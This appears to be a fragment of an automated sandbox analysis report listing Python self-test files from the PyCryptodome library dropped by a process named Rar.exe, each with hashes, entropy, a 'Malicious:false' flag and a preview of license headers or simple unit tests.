                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_importKey.py: Self-test for importing RSA keys..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..#
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1581
                                                                                                                                                                                      Entropy (8bit):5.226736646167872
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:lc+4470Gvw5hXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/Fl7SP8ryGN:N4GHwEIB0jcQHMsvI/S3oCFhS01raZa
                                                                                                                                                                                      MD5:650B195DB914D00543FFC6282AEF4386
                                                                                                                                                                                      SHA1:C12250DA69C867BF14B63D2B991A21D062C88241
                                                                                                                                                                                      SHA-256:468CD14E0B72874B146C15413D0AA19B9D1CECE91D74924F5B746142CE14EE41
                                                                                                                                                                                      SHA-512:4168A13930D6011BECBE65B9862B4146C65D8F3CE38CEEB6CC3AA57E332B8D08D2463FA3ABE285CF77AF706D75810FBD255D9FBDE3D57BC222A377F5C00C90D3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Random/__init__.py: Self-test for random number generation modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7157
                                                                                                                                                                                      Entropy (8bit):4.828342299384293
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:nwdQHvwJya+isH+rAx7iX4DRyckzfYLyWENIX1dZ:nUewJya+isMAx7ioDRyLbiREWX9
                                                                                                                                                                                      MD5:BC110BB6E2A2F78799CBA2E4A078B348
                                                                                                                                                                                      SHA1:5EA96E99799846814665A161C23E80946B11EBD3
                                                                                                                                                                                      SHA-256:8A94FE4391E4615B8FB5F4115830BD8ADDABB05CEF1E8F74F7BB9AE5F8E367F7
                                                                                                                                                                                      SHA-512:96C5E94B3304520F626F031269CBB4BB6EB81DC57E00020865B0FBDEDBF0EBD8F3C21FF51B2BC2B737192FCA0A7E3922AC88F1D6473A4061C14D5B22DCF96D2C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/test_generic.py: Self-test for the Crypto.Random.new() function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1599
                                                                                                                                                                                      Entropy (8bit):5.165215017196936
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:lc+J2w8yXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/Flw8ZB6uadPOy4:NpEIB0jcQHMsvI/S3oCFOOBzwQOaT
                                                                                                                                                                                      MD5:083FC5F35EE0DF1EC53ECAC2C412FC84
                                                                                                                                                                                      SHA1:354D57E8536552067A110B7BAB4DF8EE920528B1
                                                                                                                                                                                      SHA-256:EE9D77A0F03E91170605EE5BBC1FDD351030504B68840E5D1AC87C688B2BDAED
                                                                                                                                                                                      SHA-512:F03AC26A5574C2BC8F22A6FB6AAB894E1B757F58B95DF2391DC336CFBE7AB3BEFB0DAA8A8CB12135D0B42C3C225EBDC0F2BA98586F1F73744150372E6D77C9D8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Signature/__init__.py: Self-test for signature modules..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWA
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):58459
                                                                                                                                                                                      Entropy (8bit):5.033274153315109
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:1r6q7FYGlGFjUYy2ItfrukaJx5jsZ/iNj+rYEZRlAjfbc:1rpjj2ySkaRjtNKrYO3
                                                                                                                                                                                      MD5:DB184380CEA1F11904E6D14175913500
                                                                                                                                                                                      SHA1:59480F2DBD08D734AC553B4D37CB6743DB5204E6
                                                                                                                                                                                      SHA-256:D4C77C4DE539C4759000188159D73E22EED3997DC31D9244A6AAD476437D95BD
                                                                                                                                                                                      SHA-512:2ADED52FF8E77B12FFDCA180072C7D3B73087C4BEF145A4167D12D8026AD32851EB6763627BE31D8F61361B51DB07654146CDD56B30AA611CF07C4DF89037ECA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# SelfTest/Signature/test_dss.py: Self-test for DSS signatures..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):24708
                                                                                                                                                                                      Entropy (8bit):4.928631305766138
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:6rskrs9VqV5QJGc/S6WOYs06PDk2Q6tE1yGWEFUtce47VIUbB:6r6q7qG+WO26TzGoVG7VNB
                                                                                                                                                                                      MD5:885594421BDB74CB41BD212B07F2FE31
                                                                                                                                                                                      SHA1:07853D9DF97033A47A5CA0290A7D23AD67DB6E62
                                                                                                                                                                                      SHA-256:C9FF4BA5715303422A5E828AC80B8868C893255BD832C428F2DD369A169CA8FD
                                                                                                                                                                                      SHA-512:12662D64C764654AE7066C87D632050D53507FF39778FEE3F6D5F4C6805EEDDC6C3267978FFD91E210887AF874C418C57D17756B983D73D47D132F4DD7E6D639
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,..# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUEN
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13889
                                                                                                                                                                                      Entropy (8bit):5.0841198388491415
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/IWGRc3Wgxxu1ndXxjTVXHYjBTetB4H/UObo5FrrQyEReRBRj6Dcr:0rskrs9Vqw2xxu1nvvZKcwjNW
                                                                                                                                                                                      MD5:093398DDA0E59A51C5BF120896ECAF48
                                                                                                                                                                                      SHA1:7BB7CBCEEAC65543DE8C869443335448261DFCF8
                                                                                                                                                                                      SHA-256:30EF738E57068C05379B9E12B435A777B3FC0010935DE6BEFD01FA4C8C0C33E8
                                                                                                                                                                                      SHA-512:59AB1A3CC7C0176991B062FFEA818A61D7D670DAF1C6CBC9C37CCD914785C53B7FC17A90D605306E55C744B59E8A5F7D643AB1935F23B86F317F1DD823FBFBAC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16188
                                                                                                                                                                                      Entropy (8bit):5.334015326079158
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/ISmR/wgOLydIVOHScWJ8WuIWBExWaUYbIeDcYcOEtZ0RB2BZuOYc:0rskrs9Vq4/kbVUSdxpzcY6V5
                                                                                                                                                                                      MD5:C3413892395D1B95715A94D5B15594F7
                                                                                                                                                                                      SHA1:8D5566324873EB5BD0DF6DA4F43F4D23B443FDB0
                                                                                                                                                                                      SHA-256:42CBEB606342C984B33629AA0C2D0FE9659A9518C8BB502E9AB7E23063DBE8FA
                                                                                                                                                                                      SHA-512:5CC41F7ABDE76236C6CB3314DF824AC8947693A0273924D715771859CE0760A37553BC6554FE8B0B85DBA6F25516B024696E2DFBADFDDD0BB745F3DE855F45B6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2043
                                                                                                                                                                                      Entropy (8bit):5.237240672014205
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:NkwEIB0jcQHMsvI/S3oCFl40lSifxGEgO9JJraZa:CwfFQHvojCv9JJrB
                                                                                                                                                                                      MD5:EC15E489C4F3AF1D1987C5EA4FA2F3BC
                                                                                                                                                                                      SHA1:02FC0FA5EC2BD850A5149C4ED28598A667D41E32
                                                                                                                                                                                      SHA-256:83AE64E7E2A6D6A1E0CC643404157AD938D8A84EA9A7442F4210E10E9D5FD69E
                                                                                                                                                                                      SHA-512:8989312A6F7A87A4D78D325C5836A9541A980477797E3C0133DCB1A2E66D2646FAADDBEAA7232BE44208A01031EB9EEF4DBA5F3A1E64D637C5D5A15957158EBC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/__init__.py: Self-test for utility modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2339
                                                                                                                                                                                      Entropy (8bit):5.202413718317069
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:NxF/TEIB0jcQHMsvI/S3oCFcr+QuD0XTFBWTMhaja:5bfFQHvopH60XJBW4hZ
                                                                                                                                                                                      MD5:F8501D1710CC47279356124DDD4A9A49
                                                                                                                                                                                      SHA1:197A10A96EE658F58A107AF631A114904E4A6EC6
                                                                                                                                                                                      SHA-256:F4DFE661669A43868A44FBDC01A60DFDDED11FC5A770E8B2554152DEC251F2D3
                                                                                                                                                                                      SHA-512:EE8ACC076B992FB3C4409B5F04E06FBC6AD284886837BDEDD802CABC6228AF450333F9ABE374BFEDD24DE9CDBFD04CA7C06A93B03DB5CC54AD2CF5DCB4371D5B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/test_Counter: Self-test for the Crypto.Util.Counter module..#..# Written in 2009 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..#
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5968
                                                                                                                                                                                      Entropy (8bit):5.267773090086199
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:RnQWOqrYJALrYJHdG43tDs3EsIG13NcuIHYtP+Q2+J+0V7x0x0xQ0y0w0i0+L0+2:aDqrYJALrYJHdt3EHGuI4pH2szilvr4
                                                                                                                                                                                      MD5:045488719FC3B54CD805AFEA79086287
                                                                                                                                                                                      SHA1:0079310849DE854819E7324DBEE7A9459F297BEE
                                                                                                                                                                                      SHA-256:012373897A1401AA2BAFC1D4029E5C239355CBED106A163B57011AFDBC18C084
                                                                                                                                                                                      SHA-512:7BCF2EAE6E754C947FB3A4418491DF4AD8C99771A3D2DB0F8FA1DD1736C4118059C5CCB3C0F1B26B301155EF1DAB4F606CC56C56263F1A1AA7C078061715AA5C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# SelfTest/Util/test_Padding.py: Self-test for padding functions..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIME
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):32107
                                                                                                                                                                                      Entropy (8bit):4.8144423694550875
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Prskrs9VqIXAYJ+oGchbBZ2XmO2CQBL7plKRA0:Pr6qIXAQ+Q1BZ2XmO2CQBL7pl30
                                                                                                                                                                                      MD5:29B2837A29B459F7AC7356C3E4AFEE8C
                                                                                                                                                                                      SHA1:217FF3DBCBA7ACFCD46C51E29F7198C751767E49
                                                                                                                                                                                      SHA-256:33EE3596C53755388DD219D425DE8F1D65F3CF64346ADFA51A2DE46846A5950B
                                                                                                                                                                                      SHA-512:577671B265BCFB82A760F83DA006EE1FC6FDAD5ED34A8CB4FEF8D48E058697840E182121E93CEB9FD81A614A2E68B9011DF204B202FFE63F9125199A22B78423
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# SelfTest/Util/test_asn.py: Self-test for the Crypto.Util.asn1 module..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DIS
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with very long lines (303), with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8710
                                                                                                                                                                                      Entropy (8bit):5.184554837708348
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:jwfFQHvoBNH2Pbvf6KWvf0RoWRfrrFSRfnb3bjVj/3pjq7PfcN1Ep3S0rZ:jwdQHvd7WvfhQrrFknb3Rpta/rZ
                                                                                                                                                                                      MD5:8CFC6216203E8227001F370383E6DF55
                                                                                                                                                                                      SHA1:6B104AAA274506FED8794ED9C2414D4FA94AA6C6
                                                                                                                                                                                      SHA-256:948547B6DB811911AA4E75E5E336CED60A3BE1036D4FD6C5AC68FF86662981AF
                                                                                                                                                                                      SHA-512:CB6A289B14960AA4CDED95E21AEF8B2C2997DD90F56D9CDC033D27AEA2818F6963880553BE13DE8B647163EFFB315AA4EC87F572BD311AA62CF72102BFCC5A63
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/test_number.py: Self-test for parts of the Crypto.Util.number module..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT O
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1151
                                                                                                                                                                                      Entropy (8bit):5.090285924912527
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:+1+715k8BZTiOYBHHkhzgtJpQyRXPLy1jgpajoP:+1+717Z+OkKc7QyRXTYOajy
                                                                                                                                                                                      MD5:A0C63441A48C45F3417E90BD604DEBEE
                                                                                                                                                                                      SHA1:7D80DD96977104ECE9AD12DAE596C289AB46947C
                                                                                                                                                                                      SHA-256:4BAD1C6F40BB00F3551BCC1F1849E895178B15133E6DFCC0F10657FF1C5367A9
                                                                                                                                                                                      SHA-512:80428786485D50A4915B3BE184B7BBB674B0BC277F1966591C0BD3D6366155F02F31ABD6972A7AC9ACFACCE9039801851340080872B51597F8E71553212727DB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import unittest....import binascii..from Crypto.Util.RFC1751 import key_to_english, english_to_key......class RFC1751_Tests(unittest.TestCase):.... def test1(self):.. data = [.. ('EB33F77EE73D4053', 'TIDE ITCH SLOW REIN RULE MOT'),.. ('CCAC2AED591056BE4F90FD441C534766', 'RASH BUSH MILK LOOK BAD BRIM AVID GAFF BAIT ROT POD LOVE'),.. ('EFF81F9BFBC65350920CDD7416DE8009', 'TROD MUTE TAIL WARM CHAR KONG HAAG CITY BORE O TEAL AWL').. ].... for key_hex, words in data:.. key_bin = binascii.a2b_hex(key_hex).... w2 = key_to_english(key_bin).. self.assertEqual(w2, words).... k2 = english_to_key(words).. self.assertEqual(k2, key_bin).... def test_error_key_to_english(self):.... self.assertRaises(ValueError, key_to_english, b'0' * 7)......def get_tests(config={}):.. from Crypto.SelfTest.st_common import list_test_cases.. tests = list_test_cases(RFC1751_
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10495
                                                                                                                                                                                      Entropy (8bit):5.073385582254096
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:0Vqrskrs9t3q/ILyOZMz75bdPmbMSGSrZ7llGLrOp:08rskrs9VqHOZMxjSrZJ
                                                                                                                                                                                      MD5:FB3C8204F2C018E2825D45B12991A186
                                                                                                                                                                                      SHA1:0BB3FEDFDC56F251526FF5DE20B2058BD1FDB3B1
                                                                                                                                                                                      SHA-256:94A8D7005DAFC4F46C6DD73D758471E2E13CCAA4666D135C3F64DB04EC1E51D0
                                                                                                                                                                                      SHA-512:5DF2907343C969CFB0D5BC28C4A5A5243BCB80F70E4DD482DFCF91AB10436235934329E49122B6A0788855F55683AE9F543750BA1D5E22D683A901BBAD31FD33
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
